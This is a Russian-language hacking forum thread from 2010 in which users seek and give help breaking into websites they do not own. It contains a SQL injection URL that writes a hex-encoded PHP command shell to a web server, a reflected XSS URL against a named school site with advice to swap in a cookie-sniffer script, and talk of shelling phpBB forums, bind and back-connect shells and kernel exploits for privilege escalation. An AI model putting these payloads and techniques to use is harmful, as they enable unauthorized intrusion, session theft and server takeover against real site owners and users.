
08.04.2010, 02:16
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
.Slip не конектится через wso не могу поять почему выходит ошибка
скопировал phpadmin выходит такая ошибка
Cannot load mysql extension. Please check your PHP configuration. - Documentation
на хосте размещаются ещё несколько сайтов на некоторых есть пхпадмин захожу туда - точно такая же ошибка ... Что может это может быть?
|
|
|

08.04.2010, 09:10
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами:
8943448
Репутация:
127
|
|
сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B222 0636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--
3C3F73797374656D28245F4745545B2220636D64225D293B3F 3E -- это я захексил <?system($_GET[cmd]);?>
проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?
|
|
|

08.04.2010, 09:41
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Bramin
сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B222 0636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--
3C3F73797374656D28245F4745545B2220636D64225D293B3F 3E -- это я захексил <?system($_GET[cmd]);?>
проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?
Если maqic_quotes включен, то никак. Есть один вариант, через двойные запросы, вроде бы Scipio писал.
Но сомневаюсь, что ты понимаешь что это такое и как это реализовать, потому что вопрос действитеьно глупый.
|
|
|

08.04.2010, 13:47
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Там фреймы
|
|
|

08.04.2010, 16:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это
Unable to upload file
DEBUG MODE
Line : 251
File : usercp_avatar.php
Что посоветуете?
|
|
|

08.04.2010, 19:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Gorev
не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это
Unable to upload file
DEBUG MODE
Line : 251
File : usercp_avatar.php
Что посоветуете?
а какие остальные? В подпись eval пробовал совать? Есть вопросы - PM
PS: решено)
Последний раз редактировалось Pashkela; 08.04.2010 в 19:43..
|
|
|

08.04.2010, 19:18
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8470145
Репутация:
0
|
|
помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?
|
|
|

08.04.2010, 19:27
|
|
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
С нами:
8743576
Репутация:
241
|
|
Сообщение от -oleg-
помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?
http://school145.edu.kh.ua/livesearch/search/query/?value="><script>alert()</script>
вместо "><script>alert()</script> скрипт сниффера(например sniffer.xaknet.ru)
|
|
|

08.04.2010, 21:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Ну что же друзья, может это будет и оффтоп , но решилась не одна проблема по заливке шелла на форум пхпбб, много форумов у которых не срабатывал ни один общеизветсный способ заливки кода ,сегодня стали достоянием моего списка с шеллами. И все благодаря способу который Pashkela описал тут link .Всем рекомендую.
|
|
|

08.04.2010, 21:34
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект
не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует...
P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|